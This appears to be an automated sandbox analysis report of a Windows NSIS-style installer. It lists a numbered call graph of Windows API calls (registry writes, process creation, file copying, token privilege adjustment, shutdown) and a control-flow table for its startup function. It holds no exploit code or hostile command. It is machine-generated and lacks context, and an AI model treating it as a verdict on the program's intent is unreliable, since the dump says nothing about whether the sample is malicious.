3468->3455 3472 40586a 3468->3472 3473 4056d7 3469->3473 3474 4056ca ShowWindow 3469->3474 3470->3455 3471 40570f SendMessageW SendMessageW 3470->3471 3471->3455 3475 405886 SendMessageW 3472->3475 3484 404366 SendMessageW 3473->3484 3474->3473 3475->3475 3476 4058a3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3475->3476 3478 4058c8 SendMessageW 3476->3478 3478->3478 3479 4058f1 GlobalUnlock SetClipboardData CloseClipboard 3478->3479 3479->3455 3480->3441 3482 406418 17 API calls 3481->3482 3483 40433c SetDlgItemTextW 3482->3483 3483->3466 3484->3470 3485->3442 3487 404311 3486->3487 3488 404317 SendMessageW 3486->3488 3487->3488 3488->3444 3490 40445b 3489->3490 3491 4043b0 GetWindowLongW 3489->3491 3490->3455 3491->3490 3492 4043c5 3491->3492 3492->3490 3493 4043f2 GetSysColor 3492->3493 3494 4043f5 3492->3494 3493->3494 3495 404405 SetBkMode 3494->3495 3496 4043fb SetTextColor 3494->3496 3497 404423 3495->3497 3498 40441d GetSysColor 3495->3498 3496->3495 3499 40442a SetBkColor 3497->3499 3500 404434 3497->3500 3498->3497 3499->3500 3500->3490 3501 404447 DeleteObject 3500->3501 3502 40444e CreateBrushIndirect 3500->3502 3501->3502 3502->3490 3510 40437d 3503->3510 3505 405539 3509 405560 3505->3509 3513 401389 3505->3513 3506 40437d SendMessageW 3507 405572 OleUninitialize 3506->3507 3509->3506 3511 404395 3510->3511 3512 404386 SendMessageW 3510->3512 3511->3505 3512->3511 3515 401390 3513->3515 3514 4013fe 3514->3505 3515->3514 3516 4013cb MulDiv SendMessageW 3515->3516 3516->3515 4365 402902 4366 402d3e 17 API calls 4365->4366 4367 402909 FindFirstFileW 4366->4367 4368 402931 4367->4368 4369 40291c 4367->4369 4373 406322 wsprintfW 4368->4373 4371 40293a 4374 4063db lstrcpynW 4371->4374 4373->4371 4374->4369 4375 402482 4376 402d3e 17 API calls 4375->4376 4377 402494 4376->4377 4378 402d3e 17 API calls 4377->4378 4379 40249e 4378->4379 4392 402dce 4379->4392 4382 4024d6 4385 4024e2 4382->4385 4388 402d1c 17 API calls 4382->4388 4383 402925 4384 402d3e 17 API calls 4387 4024cc lstrlenW 4384->4387 4386 402501 RegSetValueExW 4385->4386 4389 40324c 35 API calls 4385->4389 4390 402517 RegCloseKey 4386->4390 4387->4382 4388->4385 4389->4386 4390->4383 4393 402de9 4392->4393 4396 406276 4393->4396 4397 406285 4396->4397 4398 406290 RegCreateKeyExW 4397->4398 4399 4024ae 4397->4399 4398->4399 4399->4382 4399->4383 4399->4384 4400 401503 4401 40150b 4400->4401 4403 40151e 4400->4403 4402 402d1c 17 API calls 4401->4402 4402->4403 4411 402889 4412 402890 4411->4412 4413 402b0d 4411->4413 4414 402d1c 17 API calls 4412->4414 4415 402897 4414->4415 4416 4028a6 SetFilePointer 4415->4416 4416->4413 4417 4028b6 4416->4417 4419 406322 wsprintfW 4417->4419 4419->4413 4420 40190c 4421 401943 4420->4421 4422 402d3e 17 API calls 4421->4422 4423 401948 4422->4423 4424 405aed 67 API calls 4423->4424 4425 401951 4424->4425 3745 40348f SetErrorMode GetVersion 3746 4034ce 3745->3746 3747 4034d4 3745->3747 3748 4067d0 5 API calls 3746->3748 3749 406760 3 API calls 3747->3749 3748->3747 3750 4034ea lstrlenA 3749->3750 3750->3747 3751 4034fa 3750->3751 3752 4067d0 5 API calls 3751->3752 3753 403501 3752->3753 3754 4067d0 5 API calls 3753->3754 3755 403508 3754->3755 3756 4067d0 5 API calls 3755->3756 3757 403514 #17 OleInitialize SHGetFileInfoW 3756->3757 3835 4063db lstrcpynW 3757->3835 3760 403560 GetCommandLineW 3836 4063db lstrcpynW 3760->3836 3762 403572 3763 405cdd CharNextW 3762->3763 3764 403597 CharNextW 3763->3764 3765 4036c1 GetTempPathW 3764->3765 3776 4035b0 3764->3776 3837 40345e 3765->3837 3767 4036d9 3768 403733 DeleteFileW 3767->3768 3769 4036dd GetWindowsDirectoryW lstrcatW 3767->3769 3847 403015 GetTickCount GetModuleFileNameW 3768->3847 3770 40345e 12 API calls 3769->3770 3773 4036f9 3770->3773 3771 405cdd CharNextW 3771->3776 3773->3768 3775 4036fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3773->3775 3774 403747 3777 4037fe ExitProcess OleUninitialize 3774->3777 3781 4037ea 3774->3781 3788 405cdd CharNextW 3774->3788 3778 40345e 12 API calls 3775->3778 3776->3771 3779 4036ac 3776->3779 3780 4036aa 3776->3780 3782 403934 3777->3782 3783 403814 3777->3783 3786 40372b 3778->3786 3931 4063db lstrcpynW 3779->3931 3780->3765 3875 403aaa 3781->3875 3784 4039b8 ExitProcess 3782->3784 3785 40393c GetCurrentProcess OpenProcessToken 3782->3785 3790 405a41 MessageBoxIndirectW 3783->3790 3792 403954 LookupPrivilegeValueW AdjustTokenPrivileges 3785->3792 3793 403988 3785->3793 3786->3768 3786->3777 3803 403766 3788->3803 3791 403822 ExitProcess 3790->3791 3792->3793 3796 4067d0 5 API calls 3793->3796 3794 4037fa 3794->3777 3799 40398f 3796->3799 3797 4037c4 3801 405db8 18 API calls 3797->3801 3798 40382a 3800 4059ac 5 API calls 3798->3800 3802 4039a4 ExitWindowsEx 3799->3802 3806 4039b1 3799->3806 3804 40382f lstrcatW 3800->3804 3805 4037d0 3801->3805 3802->3784 3802->3806 3803->3797 3803->3798 3807 403840 lstrcatW 3804->3807 3808 40384b lstrcatW lstrcmpiW 3804->3808 3805->3777 3932 4063db lstrcpynW 3805->3932 3809 40140b 2 API calls 3806->3809 3807->3808 3808->3777 3810 403867 3808->3810 3809->3784 3812 403873 3810->3812 3813 40386c 3810->3813 3817 40598f 2 API calls 3812->3817 3815 405912 4 API calls 3813->3815 3814 4037df 3933 4063db lstrcpynW 3814->3933 3818 403871 3815->3818 3819 403878 SetCurrentDirectoryW 3817->3819 3818->3819 3820 403893 3819->3820 3821 403888 3819->3821 3935 4063db lstrcpynW 3820->3935 3934 4063db lstrcpynW 3821->3934 3824 406418 17 API calls 3825 4038d2 DeleteFileW 3824->3825 3826 4038df CopyFileW 3825->3826 3832 4038a1 3825->3832 3826->3832 3827 403928 3828 4061a1 36 API calls 3827->3828 3830 40392f 3828->3830 3829 4061a1 36 API calls 3829->3832 3830->3777 3831 406418 17 API calls 3831->3832 3832->3824 3832->3827 3832->3829 3832->3831 3834 403913 CloseHandle 3832->3834 3936 4059c4 CreateProcessW 3832->3936 3834->3832 3835->3760 3836->3762 3838 40668a 5 API calls 3837->3838 3840 40346a 3838->3840 3839 403474 3839->3767 3840->3839 3841 405cb0 3 API calls 3840->3841 3842 40347c 3841->3842 3843 40598f 2 API calls 3842->3843 3844 403482 3843->3844 3845 405f00 2 API calls 3844->3845 3846 40348d 3845->3846 3846->3767 3939 405ed1 GetFileAttributesW CreateFileW 3847->3939 3849 403055 3868 403065 3849->3868 3940 4063db lstrcpynW 3849->3940 3851 40307b 3852 405cfc 2 API calls 3851->3852 3853 403081 3852->3853 3941 4063db lstrcpynW 3853->3941 3855 40308c GetFileSize 3856 403186 3855->3856 3870 4030a3 3855->3870 3942 402fb1 3856->3942 3858 40318f 3860 4031bf GlobalAlloc 3858->3860 3858->3868 3954 403447 SetFilePointer 3858->3954 3859 403431 ReadFile 3859->3870 3953 403447 SetFilePointer 3860->3953 3862 4031f2 3864 402fb1 6 API calls 3862->3864 3864->3868 3865 4031a8 3869 403431 ReadFile 3865->3869 3866 4031da 3867 40324c 35 API calls 3866->3867 3873 4031e6 3867->3873 3868->3774 3871 4031b3 3869->3871 3870->3856 3870->3859 3870->3862 3870->3868 3872 402fb1 6 API calls 3870->3872 3871->3860 3871->3868 3872->3870 3873->3868 3873->3873 3874 403223 SetFilePointer 3873->3874 3874->3868 3876 4067d0 5 API calls 3875->3876 3877 403abe 3876->3877 3878 403ac4 GetUserDefaultUILanguage 3877->3878 3879 403ad6 3877->3879 3955 406322 wsprintfW 3878->3955 3880 4062a9 3 API calls 3879->3880 3882 403b06 3880->3882 3884 403b25 lstrcatW 3882->3884 3885 4062a9 3 API calls 3882->3885 3883 403ad4 3956 403d80 3883->3956 3884->3883 3885->3884 3888 405db8 18 API calls 3889 403b57 3888->3889 3890 403beb 3889->3890 3892 4062a9 3 API calls 3889->3892 3891 405db8 18 API calls 3890->3891 3895 403bf1 3891->3895 3893 403b89 3892->3893 3893->3890 3901 403baa lstrlenW 3893->3901 3902 405cdd CharNextW 3893->3902 3894 403c01 LoadImageW 3897 403ca7 3894->3897 3898 403c28 RegisterClassW 3894->3898 3895->3894 3896 406418 17 API calls 3895->3896 3896->3894 3900 40140b 2 API calls 3897->3900 3899 403c5e SystemParametersInfoW CreateWindowExW 3898->3899 3930 403cb1 3898->3930 3899->3897 3905 403cad 3900->3905 3903 403bb8 lstrcmpiW 3901->3903 3904 403bde 3901->3904 3906 403ba7 3902->3906 3903->3904 3907 403bc8 GetFileAttributesW 3903->3907 3908 405cb0 3 API calls 3904->3908 3910 403d80 18 API calls 3905->3910 3905->3930 3906->3901 3909 403bd4 3907->3909 3911 403be4 3908->3911 3909->3904 3912 405cfc 2 API calls 3909->3912 3913 403cbe 3910->3913 3964 4063db lstrcpynW 3911->3964 3912->3904 3915 403cca ShowWindow 3913->3915 3916 403d4d 3913->3916 3918 406760 3 API calls 3915->3918 3917 405516 5 API calls 3916->3917 3919 403d53 3917->3919 3920 403ce2 3918->3920 3921 403d57 3919->3921 3922 403d6f 3919->3922 3923 403cf0 GetClassInfoW 3920->3923 3927 406760 3 API calls 3920->3927 3929 40140b 2 API calls 3921->3929 3921->3930 3926 40140b 2 API calls 3922->3926 3924 403d04 GetClassInfoW RegisterClassW 3923->3924 3925 403d1a DialogBoxParamW 3923->3925 3924->3925 3928 40140b 2 API calls 3925->3928 3926->3930 3927->3923 3928->3930 3929->3930 3930->3794 3931->3780 3932->3814 3933->3781 3934->3820 3935->3832 3937 405a03 3936->3937 3938 4059f7 CloseHandle 3936->3938 3937->3832 3938->3937 3939->3849 3940->3851 3941->3855 3943 402fd2 3942->3943 3944 402fba 3942->3944 3947 402fe2 GetTickCount 3943->3947 3948 402fda 3943->3948 3945 402fc3 DestroyWindow 3944->3945 3946 402fca 3944->3946 3945->3946 3946->3858 3950 402ff0 CreateDialogParamW ShowWindow 3947->3950 3951 403013 3947->3951 3949 40680c 2 API calls 3948->3949 3952 402fe0 3949->3952 3950->3951 3951->3858 3952->3858 3953->3866 3954->3865 3955->3883 3957 403d94 3956->3957 3965 406322 wsprintfW 3957->3965 3959 403e05 3960 403e39 18 API calls 3959->3960 3962 403e0a 3960->3962 3961 403b35 3961->3888 3962->3961 3963 406418 17 API calls 3962->3963 3963->3962 3964->3890 3965->3959 4426 40190f 4427 402d3e 17 API calls 4426->4427 4428 401916 4427->4428 4429 405a41 MessageBoxIndirectW 4428->4429 4430 40191f 4429->4430 4431 401491 4432 405443 24 API calls 4431->4432 4433 401498 4432->4433 3517 401f12 3518 402d3e 17 API calls 3517->3518 3519 401f18 3518->3519 3520 402d3e 17 API calls 3519->3520 3521 401f21 3520->3521 3522 402d3e 17 API calls 3521->3522 3523 401f2a 3522->3523 3524 402d3e 17 API calls 3523->3524 3525 401f33 3524->3525 3526 401423 24 API calls 3525->3526 3527 401f3a 3526->3527 3534 405a07 ShellExecuteExW 3527->3534 3529 401f82 3531 402925 3529->3531 3535 40687b WaitForSingleObject 3529->3535 3532 401f9f CloseHandle 3532->3531 3534->3529 3536 406895 3535->3536 3537 4068a7 GetExitCodeProcess 3536->3537 3540 40680c 3536->3540 3537->3532 3541 406829 PeekMessageW 3540->3541 3542 406839 WaitForSingleObject 3541->3542 3543 40681f DispatchMessageW 3541->3543 3542->3536 3543->3541 4434 402614 4435 402d3e 17 API calls 4434->4435 4436 40261b 4435->4436 4439 405ed1 GetFileAttributesW CreateFileW 4436->4439 4438 402627 4439->4438 4440 402596 4450 402d7e 4440->4450 4443 402d1c 17 API calls 4444 4025a9 4443->4444 4445 4025d1 RegEnumValueW 4444->4445 4446 4025c5 RegEnumKeyW 4444->4446 4448 402925 4444->4448 4447 4025e6 RegCloseKey 4445->4447 4446->4447 4447->4448 4451 402d3e 17 API calls 4450->4451 4452 402d95 4451->4452 4453 406248 RegOpenKeyExW 4452->4453 4454 4025a0 4453->4454 4454->4443 4455 401d17 4456 402d1c 17 API calls 4455->4456 4457 401d1d IsWindow 4456->4457 4458 401a20 4457->4458 3624 401b9b 3625 401bec 3624->3625 3627 401ba8 3624->3627 3626 401c16 GlobalAlloc 3625->3626 3629 401bf1 3625->3629 3630 406418 17 API calls 3626->3630 3631 401bbf 3627->3631 3634 401c31 3627->3634 3628 406418 17 API calls 3632 40238f 3628->3632 3637 402395 3629->3637 3643 4063db lstrcpynW 3629->3643 3630->3634 3644 4063db lstrcpynW 3631->3644 3646 405a41 3632->3646 3634->3628 3634->3637 3636 401c03 GlobalFree 3636->3637 3638 401bce 3645 4063db lstrcpynW 3638->3645 3641 401bdd 3650 4063db lstrcpynW 3641->3650 3643->3636 3644->3638 3645->3641 3647 405a56 3646->3647 3648 405aa2 3647->3648 3649 405a6a MessageBoxIndirectW 3647->3649 3648->3637 3649->3648 3650->3637 4466 402b9d SendMessageW 4467 402bc2 4466->4467 4468 402bb7 InvalidateRect 4466->4468 4468->4467 4469 404d9e GetDlgItem GetDlgItem 4470 404df2 7 API calls 4469->4470 4475 40501c 4469->4475 4471 404e9c DeleteObject 4470->4471 4472 404e8f SendMessageW 4470->4472 4473 404ea7 4471->4473 4472->4471 4476 404ede 4473->4476 4479 406418 17 API calls 4473->4479 4474 405104 4478 4051ad 4474->4478 4481 40500f 4474->4481 4487 40515a SendMessageW 4474->4487 4475->4474 4501 40508e 4475->4501 4523 404cec SendMessageW 4475->4523 4477 404331 18 API calls 4476->4477 4480 404ef2 4477->4480 4482 4051c2 4478->4482 4483 4051b6 SendMessageW 4478->4483 4484 404ec0 SendMessageW SendMessageW 4479->4484 4486 404331 18 API calls 4480->4486 4489 404398 8 API calls 4481->4489 4490 4051d4 ImageList_Destroy 4482->4490 4491 4051db 4482->4491 4498 4051eb 4482->4498 4483->4482 4484->4473 4502 404f03 4486->4502 4487->4481 4493 40516f SendMessageW 4487->4493 4488 4050f6 SendMessageW 4488->4474 4494 4053b0 4489->4494 4490->4491 4495 4051e4 GlobalFree 4491->4495 4491->4498 4492 405364 4492->4481 4499 405376 ShowWindow GetDlgItem ShowWindow 4492->4499 4497 405182 4493->4497 4495->4498 4496 404fde GetWindowLongW SetWindowLongW 4500 404ff7 4496->4500 4508 405193 SendMessageW 4497->4508 4498->4492 4516 405226 4498->4516 4528 404d6c 4498->4528 4499->4481 4503 405014 4500->4503 4504 404ffc ShowWindow 4500->4504 4501->4474 4501->4488 4502->4496 4507 404f56 SendMessageW 4502->4507 4509 404fd9 4502->4509 4510 404f94 SendMessageW 4502->4510 4511 404fa8 SendMessageW 4502->4511 4522 404366 SendMessageW 4503->4522 4521 404366 SendMessageW 4504->4521 4507->4502 4508->4478 4509->4496 4509->4500 4510->4502 4511->4502 4513 405330 4514 40533a InvalidateRect 4513->4514 4517 405346 4513->4517 4514->4517 4515 405254 SendMessageW 4518 40526a 4515->4518 4516->4515 4516->4518 4517->4492 4537 404ca7 4517->4537 4518->4513 4519 4052de SendMessageW SendMessageW 4518->4519 4519->4518 4521->4481 4522->4475 4524 404d4b SendMessageW 4523->4524 4525 404d0f GetMessagePos ScreenToClient SendMessageW 4523->4525 4526 404d43 4524->4526 4525->4526 4527 404d48 4525->4527 4526->4501 4527->4524 4540 4063db lstrcpynW 4528->4540 4530 404d7f 4541 406322 wsprintfW 4530->4541 4532 404d89 4533 40140b 2 API calls 4532->4533 4534 404d92 4533->4534 4542 4063db lstrcpynW 4534->4542 4536 404d99 4536->4516 4543 404bde 4537->4543 4539 404cbc 4539->4492 4540->4530 4541->4532 4542->4536 4544 404bf7 4543->4544 4545 406418 17 API calls 4544->4545 4546 404c5b 4545->4546 4547 406418 17 API calls 4546->4547 4548 404c66 4547->4548 4549 406418 17 API calls 4548->4549 4550 404c7c lstrlenW wsprintfW SetDlgItemTextW 4549->4550 4550->4539 4551 40149e 4552 402395 4551->4552 4553 4014ac PostQuitMessage 4551->4553 4553->4552 4554 4044a1 lstrlenW 4555 4044c0 4554->4555 4556 4044c2 WideCharToMultiByte 4554->4556 4555->4556 4557 404822 4558 40484e 4557->4558 4559 40485f 4557->4559 4618 405a25 GetDlgItemTextW 4558->4618 4561 40486b GetDlgItem 4559->4561 4562 4048ca 4559->4562 4564 40487f 4561->4564 4570 406418 17 API calls 4562->4570 4580 4049ae 4562->4580 4616 404b5d 4562->4616 4563 404859 4565 40668a 5 API calls 4563->4565 4566 404893 SetWindowTextW 4564->4566 4568 405d5b 4 API calls 4564->4568 4565->4559 4569 404331 18 API calls 4566->4569 4577 404889 4568->4577 4574 4048af 4569->4574 4575 40493e SHBrowseForFolderW 4570->4575 4571 4049de 4576 405db8 18 API calls 4571->4576 4572 404398 8 API calls 4573 404b71 4572->4573 4578 404331 18 API calls 4574->4578 4579 404956 CoTaskMemFree 4575->4579 4575->4580 4581 4049e4 4576->4581 4577->4566 4582 405cb0 3 API calls 4577->4582 4583 4048bd 4578->4583 4584 405cb0 3 API calls 4579->4584 4580->4616 4620 405a25 GetDlgItemTextW 4580->4620 4621 4063db lstrcpynW 4581->4621 4582->4566 4619 404366 SendMessageW 4583->4619 4586 404963 4584->4586 4589 40499a SetDlgItemTextW 4586->4589 4593 406418 17 API calls 4586->4593 4588 4048c3 4591 4067d0 5 API calls 4588->4591 4589->4580 4590 4049fb 4592 4067d0 5 API calls 4590->4592 4591->4562 4599 404a02 4592->4599 4594 404982 lstrcmpiW 4593->4594 4594->4589 4597 404993 lstrcatW 4594->4597 4595 404a43 4622 4063db lstrcpynW 4595->4622 4597->4589 4598 404a4a 4600 405d5b 4 API calls 4598->4600 4599->4595 4603 405cfc 2 API calls 4599->4603 4605 404a9b 4599->4605 4601 404a50 GetDiskFreeSpaceW 4600->4601 4604 404a74 MulDiv 4601->4604 4601->4605 4603->4599 4604->4605 4606 404b0c 4605->4606 4608 404ca7 20 API calls 4605->4608 4607 404b2f 4606->4607 4609 40140b 2 API calls 4606->4609 4623 404353 KiUserCallbackDispatcher 4607->4623 4610 404af9 4608->4610 4609->4607 4612 404b0e SetDlgItemTextW 4610->4612 4613 404afe 4610->4613 4612->4606 4615 404bde 20 API calls 4613->4615 4614 404b4b 4614->4616 4617 40477b SendMessageW 4614->4617 4615->4606 4616->4572 4617->4616 4618->4563 4619->4588 4620->4571 4621->4590 4622->4598 4623->4614 4624 402522 4625 402d7e 17 API calls 4624->4625 4626 40252c 4625->4626 4627 402d3e 17 API calls 4626->4627 4628 402535 4627->4628 4629 402540 RegQueryValueExW 4628->4629 4632 402925 4628->4632 4630 402560 4629->4630 4631 402566 RegCloseKey 4629->4631 4630->4631 4635 406322 wsprintfW 4630->4635 4631->4632 4635->4631 4636 4021a2 4637 402d3e 17 API calls 4636->4637 4638 4021a9 4637->4638 4639 402d3e 17 API calls 4638->4639 4640 4021b3 4639->4640 4641 402d3e 17 API calls 4640->4641 4642 4021bd 4641->4642 4643 402d3e 17 API calls 4642->4643 4644 4021c7 4643->4644 4645 402d3e 17 API calls 4644->4645 4647 4021d1 4645->4647 4646 402210 CoCreateInstance 4651 40222f 4646->4651 4647->4646 4648 402d3e 17 API calls 4647->4648 4648->4646 4649 401423 24 API calls 4650 4022ee 4649->4650 4651->4649 4651->4650 4652 4015a3 4653 402d3e 17 API calls 4652->4653 4654 4015aa SetFileAttributesW 4653->4654 4655 4015bc 4654->4655 4656 401fa4 4657 402d3e 17 API calls 4656->4657 4658 401faa 4657->4658 4659 405443 24 API calls 4658->4659 4660 401fb4 4659->4660 4661 4059c4 2 API calls 4660->4661 4662 401fba 4661->4662 4663 401fdd CloseHandle 4662->4663 4665 40687b 5 API calls 4662->4665 4666 402925 4662->4666 4663->4666 4667 401fcf 4665->4667 4667->4663 4669 406322 wsprintfW 4667->4669 4669->4663 4670 40202a 4671 402d3e 17 API calls 4670->4671 4672 402031 4671->4672 4673 4067d0 5 API calls 4672->4673 4674 402040 4673->4674 4675 40205c GlobalAlloc 4674->4675 4677 4020c4 4674->4677 4676 402070 4675->4676 4675->4677 4678 4067d0 5 API calls 4676->4678 4679 402077 4678->4679 4680 4067d0 5 API calls 4679->4680 4681 402081 4680->4681 4681->4677 4685 406322 wsprintfW 4681->4685 4683 4020b6 4686 406322 wsprintfW 4683->4686 4685->4683 4686->4677 4687 4023aa 4688 4023b2 4687->4688 4689 4023b8 4687->4689 4690 402d3e 17 API calls 4688->4690 4691 4023c6 4689->4691 4692 402d3e 17 API calls 4689->4692 4690->4689 4693 402d3e 17 API calls 4691->4693 4696 4023d4 4691->4696 4692->4691 4693->4696 4694 402d3e 17 API calls 4695 4023dd WritePrivateProfileStringW 4694->4695 4696->4694 4697 402f2b 4698 402f3d SetTimer 4697->4698 4701 402f56 4697->4701 4698->4701 4699 402fab 4700 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4700->4699 4701->4699 4701->4700 4702 40242c 4703 402434 4702->4703 4704 40245f 4702->4704 4705 402d7e 17 API calls 4703->4705 4706 402d3e 17 API calls 4704->4706 4707 40243b 4705->4707 4708 402466 4706->4708 4710 402d3e 17 API calls 4707->4710 4712 402473 4707->4712 4713 402dfc 4708->4713 4711 40244c RegDeleteValueW RegCloseKey 4710->4711 4711->4712 4714 402e09 4713->4714 4715 402e10 4713->4715 4714->4712 4715->4714 4717 402e41 4715->4717 4718 406248 RegOpenKeyExW 4717->4718 4719 402e6f 4718->4719 4720 402e7f RegEnumValueW 4719->4720 4727 402f19 4719->4727 4729 402ea2 4719->4729 4721 402f09 RegCloseKey 4720->4721 4720->4729 4721->4727 4722 402ede RegEnumKeyW 4723 402ee7 RegCloseKey 4722->4723 4722->4729 4724 4067d0 5 API calls 4723->4724 4725 402ef7 4724->4725 4725->4727 4728 402efb RegDeleteKeyW 4725->4728 4726 402e41 6 API calls 4726->4729 4727->4714 4728->4727 4729->4721 4729->4722 4729->4723 4729->4726 4730 406f2f 4732 40697e 4730->4732 4731 4072e9 4732->4731 4732->4732 4733 406a08 GlobalAlloc 4732->4733 4734 4069ff GlobalFree 4732->4734 4735 406a76 GlobalFree 4732->4735 4736 406a7f GlobalAlloc 4732->4736 4733->4731 4733->4732 4734->4733 4735->4736 4736->4731 4736->4732 4737 401a30 4738 402d3e 17 API calls 4737->4738 4739 401a39 ExpandEnvironmentStringsW 4738->4739 4740 401a60 4739->4740 4741 401a4d 4739->4741 4741->4740 4742 401a52 lstrcmpW 4741->4742 4742->4740 4755 401735 4756 402d3e 17 API calls 4755->4756 4757 40173c SearchPathW 4756->4757 4758 401757 4757->4758 4759 402636 4760 402665 4759->4760 4761 40264a 4759->4761 4763 402695 4760->4763 4764 40266a 4760->4764 4762 402d1c 17 API calls 4761->4762 4773 402651 4762->4773 4766 402d3e 17 API calls 4763->4766 4765 402d3e 17 API calls 4764->4765 4767 402671 4765->4767 4768 40269c lstrlenW 4766->4768 4776 4063fd WideCharToMultiByte 4767->4776 4768->4773 4770 402685 lstrlenA 4770->4773 4771 4026df 4772 4026c9 4772->4771 4774 405f83 WriteFile 4772->4774 4773->4771 4773->4772 4775 405fb2 5 API calls 4773->4775 4774->4771 4775->4772 4776->4770 4777 4053b7 4778 4053c7 4777->4778 4779 4053db 4777->4779 4781 405424 4778->4781 4782 4053cd 4778->4782 4780 4053e3 IsWindowVisible 4779->4780 4788 4053fa 4779->4788 4780->4781 4783 4053f0 4780->4783 4784 405429 CallWindowProcW 4781->4784 4785 40437d SendMessageW 4782->4785 4787 404cec 5 API calls 4783->4787 4786 4053d7 4784->4786 4785->4786 4787->4788 4788->4784 4789 404d6c 4 API calls 4788->4789 4789->4781 4797 401d38 4798 402d1c 17 API calls 4797->4798 4799 401d3f 4798->4799 4800 402d1c 17 API calls 4799->4800 4801 401d4b GetDlgItem 4800->4801 4802 402630 4801->4802 4803 4014b8 4804 4014be 4803->4804 4805 401389 2 API calls 4804->4805 4806 4014c6 4805->4806 4807 4028bb 4808 4028c1 4807->4808 4809 402bc2 4808->4809 4810 4028c9 FindClose 4808->4810 4810->4809

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 0040348F Relevance: 82.7, APIs: 33, Strings: 14, Instructions: 410stringfilecomCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 40348f-4034cc SetErrorMode GetVersion 1 4034ce-4034d6 call 4067d0 0->1 2 4034df 0->2 1->2 7 4034d8 1->7 4 4034e4-4034f8 call 406760 lstrlenA 2->4 9 4034fa-403516 call 4067d0 * 3 4->9 7->2 16 403527-403586 #17 OleInitialize SHGetFileInfoW call 4063db GetCommandLineW call 4063db 9->16 17 403518-40351e 9->17 24 403590-4035aa call 405cdd CharNextW 16->24 25 403588-40358f 16->25 17->16 21 403520 17->21 21->16 28 4035b0-4035b6 24->28 29 4036c1-4036db GetTempPathW call 40345e 24->29 25->24 30 4035b8-4035bd 28->30 31 4035bf-4035c3 28->31 38 403733-40374d DeleteFileW call 403015 29->38 39 4036dd-4036fb GetWindowsDirectoryW lstrcatW call 40345e 29->39 30->30 30->31 33 4035c5-4035c9 31->33 34 4035ca-4035ce 31->34 33->34 36 4035d4-4035da 34->36 37 40368d-40369a call 405cdd 34->37 43 4035f5-40362e 36->43 44 4035dc-4035e4 36->44 54 40369c-40369d 37->54 55 40369e-4036a4 37->55 56 403753-403759 38->56 57 4037fe-40380e ExitProcess OleUninitialize 38->57 39->38 52 4036fd-40372d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40345e 39->52 50 403630-403635 43->50 51 40364b-403685 43->51 48 4035e6-4035e9 44->48 49 4035eb 44->49 48->43 48->49 49->43 50->51 58 403637-40363f 50->58 51->37 53 403687-40368b 51->53 52->38 52->57 53->37 60 4036ac-4036ba call 4063db 53->60 54->55 55->28 61 4036aa 55->61 62 4037ee-4037f5 call 403aaa 56->62 63 40375f-40376a call 405cdd 56->63 64 403934-40393a 57->64 65 403814-403824 call 405a41 ExitProcess 57->65 66 403641-403644 58->66 67 403646 58->67 71 4036bf 60->71 61->71 80 4037fa 62->80 84 4037b8-4037c2 63->84 85 40376c-4037a1 63->85 68 4039b8-4039c0 64->68 69 40393c-403952 GetCurrentProcess OpenProcessToken 64->69 66->51 66->67 67->51 81 4039c2 68->81 82 4039c6-4039ca ExitProcess 68->82 77 403954-403982 LookupPrivilegeValueW AdjustTokenPrivileges 69->77 78 403988-403996 call 4067d0 69->78 71->29 77->78 92 4039a4-4039af ExitWindowsEx 78->92 93 403998-4039a2 78->93 80->57 81->82 86 4037c4-4037d2 call 405db8 84->86 87 40382a-40383e call 4059ac lstrcatW 84->87 89 4037a3-4037a7 85->89 86->57 102 4037d4-4037ea call 4063db * 2 86->102 100 403840-403846 lstrcatW 87->100 101 40384b-403865 lstrcatW lstrcmpiW 87->101 94 4037b0-4037b4 89->94 95 4037a9-4037ae 89->95 92->68 99 4039b1-4039b3 call 40140b 92->99 93->92 93->99 94->89 96 4037b6 94->96 95->94 95->96 96->84 99->68 100->101 101->57 105 403867-40386a 101->105 102->62 107 403873 call 40598f 105->107 108 40386c-403871 call 405912 105->108 115 403878-403886 SetCurrentDirectoryW 107->115 108->115 116 403893-4038bc call 4063db 115->116 117 403888-40388e call 4063db 115->117 121 4038c1-4038dd call 406418 DeleteFileW 116->121 117->116 124 40391e-403926 121->124 125 4038df-4038ef CopyFileW 121->125 124->121 127 403928-40392f call 4061a1 124->127 125->124 126 4038f1-403911 call 4061a1 call 406418 call 4059c4 125->126 126->124 136 403913-40391a CloseHandle 126->136 127->57 136->124
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNELBASE ref: 004034B2
                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 004034B8
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
                                                                                                                                                                                                                                  • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040352F
                                                                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
                                                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
                                                                                                                                                                                                                                  • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 00403598
                                                                                                                                                                                                                                    • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                                                                                                                                                    • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036D2
                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                                                                                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EF
